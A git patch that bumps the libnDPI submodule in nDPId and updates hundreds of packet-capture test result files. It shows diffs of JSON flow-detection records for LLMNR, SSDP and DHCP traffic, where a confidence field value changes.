From a606586a32e1bc065a182ae1973d2565f472ec8d Mon Sep 17 00:00:00 2001 From: Toni Uhlig Date: Thu, 14 Jul 2022 03:48:06 +0200 Subject: bump libnDPI to 7c19de49047a5731f3107ff17854e9afe839cc61 Signed-off-by: Toni Uhlig --- libnDPI | 2 +- test/results/1kxun.pcap.out | 746 +++++---- test/results/443-chrome.pcap.out | 6 +- test/results/443-curl.pcap.out | 14 +- test/results/443-firefox.pcap.out | 14 +- test/results/443-git.pcap.out | 14 +- test/results/443-opvn.pcap.out | 10 +- test/results/443-safari.pcap.out | 14 +- test/results/4in4tunnel.pcap.out | 6 +- test/results/4in6tunnel.pcap.out | 10 +- test/results/6in4tunnel.pcap.out | 6 +- test/results/6in6tunnel.pcap.out | 6 +- test/results/BGP_Cisco_hdlc_slarp.pcap.out | 10 +- test/results/BGP_redist.pcap.out | 10 +- test/results/EAQ.pcap.out | 130 +- test/results/FAX-Call-t38-CA-TDM-SIP-FB-1.pcap.out | 26 +- test/results/IEC104.pcap.out | 14 +- test/results/KakaoTalk_chat.pcap.out | 196 +-- test/results/KakaoTalk_talk.pcap.out | 56 +- test/results/NTPv2.pcap.out | 10 +- test/results/NTPv3.pcap.out | 10 +- test/results/NTPv4.pcap.out | 10 +- test/results/Oscar.pcap.out | 6 +- test/results/WebattackRCE.pcap.out | 1600 ++++++++++---------- test/results/WebattackSQLinj.pcap.out | 42 +- test/results/WebattackXSS.pcap.out | 94 +- test/results/afp.pcap.out | 10 +- test/results/agora-sd-rtn.pcap.out | 112 +- test/results/ah.pcapng.out | 14 +- test/results/aimini-http.pcap.out | 22 +- test/results/ajp.pcap.out | 14 +- test/results/alexa-app.pcapng.out | 876 +++++------ test/results/among_us.pcap.out | 10 +- test/results/amqp.pcap.out | 18 +- test/results/android.pcap.out | 325 ++-- test/results/anyconnect-vpn.pcap.out | 307 ++-- test/results/anydesk-2.pcap.out | 30 +- test/results/anydesk.pcap.out | 16 +- test/results/avast_securedns.pcapng.out | 162 +- test/results/bad-dns-traffic.pcap.out | 34 +- test/results/badpackets.pcap.out | 6 +- test/results/bitcoin.pcap.out | 30 +- test/results/bittorrent.pcap.out | 102 +- test/results/bittorrent_utp.pcap.out | 15 +- test/results/bjnp.pcap.out | 46 +- test/results/bot.pcap.out | 10 +- test/results/bt_search.pcap.out | 8 +- test/results/cachefly.pcapng.out | 26 + test/results/capwap.pcap.out | 24 +- test/results/cassandra.pcap.out | 14 +- test/results/check_mk_new.pcap.out | 10 +- test/results/chrome.pcap.out | 42 +- test/results/citrix.pcap.out | 10 +- test/results/cloudflare-warp.pcap.out | 67 + test/results/coap_mqtt.pcap.out | 70 +- test/results/collectd.pcap.out | 38 +- test/results/corba.pcap.out | 18 +- test/results/cpha.pcap.out | 10 +- test/results/dazn.pcapng.out | 24 +- test/results/dcerpc.pcap.out | 22 +- test/results/dhcp-fuzz.pcapng.out | 6 +- test/results/diameter.pcap.out | 10 +- test/results/discord.pcap.out | 14 +- test/results/dlt_ppp.pcap.out | 6 +- test/results/dnp3.pcap.out | 38 +- test/results/dns-invalid-chars.pcap.out | 12 +- test/results/dns-tunnel-iodine.pcap.out | 12 +- test/results/dns_ambiguous_names.pcap.out | 66 +- test/results/dns_doh.pcap.out | 12 +- test/results/dns_dot.pcap.out | 12 +- test/results/dns_exfiltration.pcap.out | 12 +- test/results/dns_fragmented.pcap.out | 130 +- test/results/dns_invert_query.pcapng.out | 8 +- test/results/dns_long_domainname.pcap.out | 12 +- .../dnscrypt-v1-and-resolver-pings.pcap.out | 998 ++++++------ test/results/dnscrypt-v2-doh.pcap.out | 214 +-- test/results/dnscrypt-v2.pcap.out | 18 +- .../dnscrypt_skype_false_positive.pcapng.out | 12 +- test/results/doq.pcapng.out | 14 +- test/results/doq_adguard.pcapng.out | 10 +- test/results/dos_win98_smb_netbeui.pcap.out | 22 +- test/results/drda_db2.pcap.out | 10 +- test/results/dropbox.pcap.out | 82 +- test/results/dtls.pcap.out | 8 +- test/results/dtls2.pcap.out | 14 +- test/results/dtls_certificate.pcapng.out | 10 +- test/results/dtls_certificate_fragments.pcap.out | 12 +- test/results/dtls_mid_sessions.pcapng.out | 40 + test/results/dtls_old_version.pcapng.out | 25 + .../dtls_session_id_and_coockie_both.pcap.out | 12 +- test/results/emotet.pcap.out | 47 +- test/results/encrypted_sni.pcap.out | 12 +- test/results/esp.pcapng.out | 14 +- test/results/ethereum.pcap.out | 290 ++-- test/results/ethernetIP.pcap.out | 22 +- test/results/exe_download.pcap.out | 12 +- test/results/exe_download_as_png.pcap.out | 12 +- test/results/facebook.pcap.out | 20 +- test/results/firefox.pcap.out | 42 +- test/results/fix.pcap.out | 54 +- test/results/fix2.pcap.out | 14 +- test/results/forticlient.pcap.out | 46 +- test/results/ftp-start-tls.pcap.out | 10 +- test/results/ftp.pcap.out | 14 +- test/results/ftp_failed.pcap.out | 10 +- test/results/fuzz-2006-06-26-2594.pcap.out | 776 +++++----- test/results/fuzz-2006-09-29-28586.pcap.out | 44 +- test/results/fuzz-2020-02-16-11740.pcap.out | 258 ++-- test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out | 6 +- test/results/fuzz-2021-10-13.pcap.out | 6 +- test/results/genshin-impact.pcap.out | 30 +- test/results/git.pcap.out | 10 +- test/results/gnutella.pcap.out | 866 +++++------ test/results/google_ssl.pcap.out | 6 +- test/results/googledns_android10.pcap.out | 48 +- test/results/gquic.pcap.out | 10 +- test/results/gre_no_options.pcapng.out | 10 +- test/results/gtp_c.pcap.out | 10 +- test/results/gtp_false_positive.pcapng.out | 6 +- test/results/gtp_prime.pcapng.out | 6 +- test/results/h323-overflow.pcap.out | 6 +- test/results/h323.pcap.out | 14 +- test/results/hangout.pcap.out | 10 +- test/results/hpvirtgrp.pcap.out | 42 +- test/results/hsrp0.pcap.out | 22 +- test/results/hsrp2.pcap.out | 14 +- test/results/hsrp2_ipv6.pcapng.out | 14 +- .../http-crash-content-disposition.pcap.out | 10 +- test/results/http-lines-split.pcap.out | 10 +- test/results/http-manipulated.pcap.out | 14 +- test/results/http_auth.pcap.out | 10 +- test/results/http_connect.pcap.out | 22 +- test/results/http_ipv6.pcap.out | 58 +- test/results/i3d.pcap.out | 44 + test/results/iax.pcap.out | 10 +- test/results/icmp-tunnel.pcap.out | 26 +- test/results/iec60780-5-104.pcap.out | 30 +- test/results/imap-starttls.pcap.out | 10 +- test/results/imap.pcap.out | 10 +- test/results/imaps.pcap.out | 14 +- test/results/imo.pcap.out | 14 +- test/results/instagram.pcap.out | 159 +- test/results/ip_fragmented_garbage.pcap.out | 6 +- test/results/iphone.pcap.out | 282 ++-- test/results/ipp.pcap.out | 18 +- test/results/ipsec_isakmp_esp.pcap.out | 174 +-- test/results/ipv6_in_gtp.pcap.out | 6 +- test/results/irc.pcap.out | 10 +- test/results/ja3_lots_of_cipher_suites.pcap.out | 6 +- .../ja3_lots_of_cipher_suites_2_anon.pcap.out | 10 +- test/results/jabber.pcap.out | 110 +- test/results/kerberos-error.pcap.out | 23 + test/results/kerberos-login.pcap.out | 60 +- test/results/kerberos.pcap.out | 54 +- test/results/kerberos_fuzz.pcapng.out | 8 +- test/results/kontiki.pcap.out | 30 +- test/results/lisp_registration.pcap.out | 22 +- test/results/log4j-webapp-exploit.pcap.out | 30 +- test/results/long_tls_certificate.pcap.out | 14 +- test/results/malformed_dns.pcap.out | 12 +- test/results/malformed_icmp.pcap.out | 10 +- test/results/malware.pcap.out | 26 +- test/results/memcached.cap.out | 10 +- test/results/mgcp.pcapng.out | 10 +- test/results/modbus.pcap.out | 10 +- test/results/monero.pcap.out | 14 +- test/results/mongo_false_positive.pcapng.out | 24 + test/results/mongodb.pcap.out | 26 +- test/results/mpeg-dash.pcap.out | 22 +- test/results/mpeg.pcap.out | 12 +- test/results/mpegts.pcap.out | 10 +- test/results/mqtt.pcap.out | 14 +- test/results/mssql_tds.pcap.out | 50 +- test/results/mysql-8.pcap.out | 10 +- test/results/nats.pcap.out | 14 +- ...ndpi_match_string_subprotocol__error.pcapng.out | 10 +- test/results/nest_log_sink.pcap.out | 78 +- test/results/netbios.pcap.out | 62 +- test/results/netbios_wildcard_dns_query.pcap.out | 8 +- test/results/netflix.pcap.out | 350 ++--- test/results/netflow-fritz.pcap.out | 10 +- test/results/netflowv9.pcap.out | 10 +- test/results/nfsv2.pcap.out | 34 +- test/results/nfsv3.pcap.out | 38 +- test/results/nintendo.pcap.out | 86 +- test/results/nntp.pcap.out | 10 +- test/results/no_sni.pcap.out | 50 +- test/results/ocs.pcap.out | 60 +- test/results/ocsp.pcapng.out | 46 +- test/results/ookla.pcap.out | 14 +- test/results/openvpn.pcap.out | 18 +- test/results/oracle12.pcapng.out | 6 +- test/results/os_detected.pcapng.out | 10 +- test/results/ospfv2_add_new_prefix.pcap.out | 10 +- test/results/pgm.pcap.out | 10 +- test/results/pgsql.pcap.out | 14 +- test/results/pim.pcap.out | 10 +- test/results/pinterest.pcap.out | 154 +- test/results/pluralsight.pcap.out | 50 +- test/results/pop3.pcap.out | 10 +- test/results/pops.pcapng.out | 10 +- test/results/pps.pcap.out | 280 ++-- test/results/pptp.pcap.out | 10 +- test/results/psiphon3.pcap.out | 26 + test/results/punycode-idn.pcap.out | 20 +- test/results/quic-23.pcap.out | 10 +- test/results/quic-24.pcap.out | 10 +- test/results/quic-27.pcap.out | 10 +- test/results/quic-28.pcap.out | 10 +- test/results/quic-29.pcap.out | 10 +- test/results/quic-33.pcapng.out | 10 +- test/results/quic-34.pcap.out | 10 +- test/results/quic-fuzz-overflow.pcapng.out | 10 +- test/results/quic-mvfst-22.pcap.out | 10 +- .../quic-mvfst-22_decryption_error.pcap.out | 10 +- test/results/quic-mvfst-27.pcapng.out | 10 +- test/results/quic-mvfst-exp.pcap.out | 10 +- test/results/quic-v2-01.pcapng.out | 10 +- test/results/quic.pcap.out | 42 +- test/results/quic046.pcap.out | 10 +- test/results/quic_0RTT.pcap.out | 10 +- test/results/quic_crypto_aes_auth_size.pcap.out | 14 +- .../quic_frags_ch_in_multiple_packets.pcapng.out | 12 +- ...h_out_of_order_same_packet_craziness.pcapng.out | 458 +++--- test/results/quic_interop_V.pcapng.out | 314 ++-- test/results/quic_q39.pcap.out | 10 +- test/results/quic_q43.pcap.out | 10 +- test/results/quic_q46.pcap.out | 10 +- test/results/quic_q46_b.pcap.out | 10 +- test/results/quic_q50.pcap.out | 10 +- test/results/quic_t50.pcap.out | 10 +- test/results/quic_t51.pcap.out | 10 +- test/results/quickplay.pcap.out | 77 +- test/results/radius_false_positive.pcapng.out | 6 +- test/results/raknet.pcap.out | 54 +- test/results/rdp.pcap.out | 10 +- test/results/reasm_crash_anon.pcapng.out | 6 +- test/results/reasm_segv_anon.pcapng.out | 10 +- test/results/reddit.pcap.out | 410 ++--- test/results/riotgames.pcap.out | 73 + test/results/rsh-syslog-false-positive.pcap.out | 10 +- test/results/rsh.pcap.out | 14 +- test/results/rsync.pcap.out | 10 +- test/results/rtmp.pcap.out | 10 +- test/results/rtsp.pcap.out | 34 +- test/results/rtsp_setup_http.pcapng.out | 10 +- test/results/rx.pcap.out | 26 +- test/results/s7comm.pcap.out | 10 +- test/results/safari.pcap.out | 52 +- test/results/salesforce.pcap.out | 14 +- test/results/sccp_hw_conf_register.pcapng.out | 10 +- test/results/sctp.cap.out | 14 +- test/results/selfsigned.pcap.out | 12 +- test/results/sflow.pcap.out | 10 +- test/results/signal.pcap.out | 128 +- test/results/simple-dnscrypt.pcap.out | 38 +- test/results/sip.pcap.out | 36 +- test/results/sip_hello.pcapng.out | 26 + test/results/sites.pcapng.out | 276 ++-- test/results/skinny.pcap.out | 70 + test/results/skype-conference-call.pcap.out | 10 +- test/results/skype.pcap.out | 814 +++++----- test/results/skype_no_unknown.pcap.out | 811 +++++----- test/results/skype_udp.pcap.out | 14 +- test/results/smb_deletefile.pcap.out | 10 +- test/results/smb_frags.pcap.out | 24 + test/results/smbv1.pcap.out | 10 +- test/results/smpp_in_general.pcap.out | 10 +- test/results/smtp-starttls.pcap.out | 17 +- test/results/smtp.pcap.out | 10 +- test/results/smtps.pcapng.out | 10 +- test/results/snapchat.pcap.out | 24 +- test/results/snapchat_call.pcapng.out | 15 +- test/results/snmp.pcap.out | 80 +- test/results/soap.pcap.out | 18 +- test/results/socks-http-example.pcap.out | 14 +- test/results/softether-http.pcap.out | 8 +- test/results/someip-tp.pcap.out | 10 +- test/results/someip-udp-method-call.pcapng.out | 14 +- test/results/someip_sd_sample.pcap.out | 6 +- test/results/sql_injection.pcap.out | 10 +- test/results/ssdp-m-search-ua.pcap.out | 10 +- test/results/ssdp-m-search.pcap.out | 10 +- test/results/ssh.pcap.out | 18 +- test/results/ssl-cert-name-mismatch.pcap.out | 14 +- test/results/starcraft_battle.pcap.out | 180 +-- test/results/steam.pcap.out | 226 +-- test/results/steam_datagram_relay_ping.pcapng.out | 10 +- test/results/stun_facebook.pcapng.out | 10 +- test/results/stun_signal.pcapng.out | 96 +- test/results/synscan.pcap.out | 22 +- test/results/syslog.pcap.out | 78 +- .../targusdataspeed_false_positives.pcap.out | 27 + test/results/teams.pcap.out | 433 +++--- test/results/teamspeak3.pcap.out | 10 +- test/results/teamviewer.pcap.out | 14 +- test/results/telegram.pcap.out | 210 +-- test/results/telnet.pcap.out | 16 +- test/results/teredo.pcap.out | 26 +- test/results/tftp.pcap.out | 79 +- test/results/threema.pcap.out | 57 + test/results/tinc.pcap.out | 22 +- test/results/tk.pcap.out | 24 +- test/results/tls-appdata.pcap.out | 14 +- test/results/tls-esni-fuzzed.pcap.out | 12 +- test/results/tls-rdn-extract.pcap.out | 14 +- test/results/tls_alert.pcap.out | 12 +- test/results/tls_certificate_too_long.pcap.out | 184 +-- test/results/tls_cipher_lens.pcap.out | 16 +- test/results/tls_esni_sni_both.pcap.out | 18 +- test/results/tls_false_positives.pcapng.out | 24 + test/results/tls_invalid_reads.pcap.out | 25 +- test/results/tls_long_cert.pcap.out | 14 +- test/results/tls_port_80.pcapng.out | 10 +- test/results/tls_torrent.pcapng.out | 14 +- test/results/tls_verylong_certificate.pcap.out | 14 +- test/results/toca-boca.pcap.out | 74 +- test/results/tor.pcap.out | 62 +- test/results/trickbot.pcap.out | 12 +- test/results/tumblr.pcap.out | 102 +- test/results/tunnelbear.pcap.out | 163 ++ test/results/ubntac2.pcap.out | 38 +- test/results/ultrasurf.pcap.out | 38 + test/results/upnp.pcap.out | 14 +- test/results/viber.pcap.out | 148 +- test/results/vnc.pcap.out | 14 +- test/results/vrrp3.pcapng.out | 14 +- test/results/vxlan.pcap.out | 42 +- test/results/wa_video.pcap.out | 58 +- test/results/wa_voice.pcap.out | 126 +- test/results/waze.pcap.out | 156 +- test/results/webex.pcap.out | 268 ++-- test/results/websocket.pcap.out | 10 +- test/results/wechat.pcap.out | 448 +++--- test/results/weibo.pcap.out | 109 +- test/results/whatsapp.pcap.out | 350 ++--- test/results/whatsapp_login_call.pcap.out | 172 +-- test/results/whatsapp_login_chat.pcap.out | 42 +- test/results/whatsapp_voice_and_message.pcap.out | 58 +- test/results/whatsappfiles.pcap.out | 20 +- test/results/whois.pcapng.out | 16 +- test/results/windowsupdate_over_http.pcap.out | 24 + test/results/wireguard.pcap.out | 14 +- test/results/wow.pcap.out | 26 +- test/results/xdmcp.pcap.out | 10 +- test/results/xiaomi.pcap.out | 32 +- test/results/xss.pcap.out | 10 +- test/results/youtube_quic.pcap.out | 18 +- test/results/youtubeupload.pcap.out | 22 +- test/results/z3950.pcapng.out | 10 +- test/results/zabbix.pcap.out | 10 +- test/results/zattoo.pcap.out | 16 +- test/results/zcash.pcap.out | 10 +- test/results/zoom.pcap.out | 170 +-- test/results/zoom2.pcap.out | 18 +- 355 files changed, 11812 insertions(+), 10920 deletions(-) create mode 100644 test/results/cachefly.pcapng.out create mode 100644 test/results/cloudflare-warp.pcap.out create mode 100644 test/results/dtls_mid_sessions.pcapng.out create mode 100644 test/results/dtls_old_version.pcapng.out create mode 100644 test/results/i3d.pcap.out create mode 100644 test/results/kerberos-error.pcap.out create mode 100644 test/results/mongo_false_positive.pcapng.out create mode 100644 test/results/psiphon3.pcap.out create mode 100644 test/results/riotgames.pcap.out create mode 100644 test/results/sip_hello.pcapng.out create mode 100644 test/results/skinny.pcap.out create mode 100644 test/results/smb_frags.pcap.out create mode 100644 test/results/targusdataspeed_false_positives.pcap.out create mode 100644 test/results/threema.pcap.out create mode 100644 test/results/tls_false_positives.pcapng.out create mode 100644 test/results/tunnelbear.pcap.out create mode 100644 test/results/ultrasurf.pcap.out create mode 100644 test/results/windowsupdate_over_http.pcap.out diff --git a/libnDPI b/libnDPI index 8f6a006e3..7c19de490 160000 --- a/libnDPI +++ b/libnDPI @@ -1 +1 @@ -Subproject commit 8f6a006e36eef0ae386f7e663d3ebecfad6a2dc9 +Subproject commit 7c19de49047a5731f3107ff17854e9afe839cc61 diff --git a/test/results/1kxun.pcap.out b/test/results/1kxun.pcap.out index f6ae1b111..8ee48b0c6 100644 --- a/test/results/1kxun.pcap.out +++ b/test/results/1kxun.pcap.out @@ -2,83 +2,83 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"1kxun.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1470104373025} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373025,"flow_last_seen":1470104373025,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104373025,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1470104373025,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104373025,"pkt":"AQBeAAD8SNIkYzEACABFAAA2OooAAAER2FzAqAUs4AAA\/OizFOsAIin75qEAAAABAAAAAAAACGphc29uLVBDAAD\/AAE="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373025,"flow_last_seen":1470104373025,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104373025,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373025,"flow_last_seen":1470104373025,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104373025,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1470104373127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104373127,"pkt":"AQBeAAD8SNIkYzEACABFAAA2OosAAAER2FvAqAUs4AAA\/OizFOsAIin75qEAAAABAAAAAAAACGphc29uLVBDAAD\/AAE="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1470104373232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104373232,"pkt":"AQBef\/\/6GF4PUugBCABFAAChMBcAAAER01nAqAU57\/\/\/+toBB2wAjcGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1470104373232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104373232,"pkt":"AQBef\/\/6SNIkYzEACABFAAChOowAAAERyPHAqAUs7\/\/\/+si9B2wAjdLxTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1470104373741,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104373741,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNKS5AgEGAMCRIFIAAIAAwKgFJMCoBSTAqHcBAAAAAAAmWsJjVQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQEKgioX8MMe8wtdP8AAAAA"} -00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} +00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": 